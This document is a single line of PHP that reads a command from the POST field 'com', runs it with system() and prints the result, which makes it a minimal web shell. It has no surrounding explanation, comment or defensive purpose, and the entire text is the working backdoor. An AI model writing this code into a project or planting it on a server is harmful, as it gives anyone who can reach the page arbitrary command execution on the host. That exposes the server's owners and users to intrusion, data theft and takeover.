$command=$_POST["com"];$s=system($command);echo $s;